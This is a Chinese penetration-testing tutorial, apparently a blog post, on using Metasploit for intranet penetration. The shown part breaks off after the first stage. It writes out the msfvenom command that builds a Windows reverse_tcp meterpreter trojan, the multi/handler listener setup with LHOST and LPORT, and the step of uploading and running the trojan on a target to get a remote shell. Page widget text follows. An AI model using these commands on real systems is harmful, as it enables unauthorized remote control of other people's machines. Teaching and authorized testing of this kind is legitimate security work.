MSF内网渗透实战

零基础学黑客,搜索公众号:白帽子左一

作者:掌控安全-小熊保安

本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀.

一、MSF生成木马上线目标

1. 生成木马
使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f exe > exp.exe 创建一个msf的木马(不免杀版本)

其中 -p 后面的内容是使用的 payload类型,LHOST是vps的地址,LPORT是端口

图片

2. 监听端口
命令: use exploit/multi/handler 使用msf的监听模块

设置payload: set payload windows/x64/meterpreter/reverse_tcp

这里和生成木马的时候写的payload要一样,否则会链接不上,如下图

图片

设置监听地址以及端口:

set lhost xxx.xxx.xxx.xxx
set lport 4444

设置好了之后 直接run 监听起来。

3. 弹回Meterpreter会话
将生成的msf的木马上传到目标服务器上,然后直接运行

图片

运行之后,vps的msf会收到一个弹回的met

  • 3
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值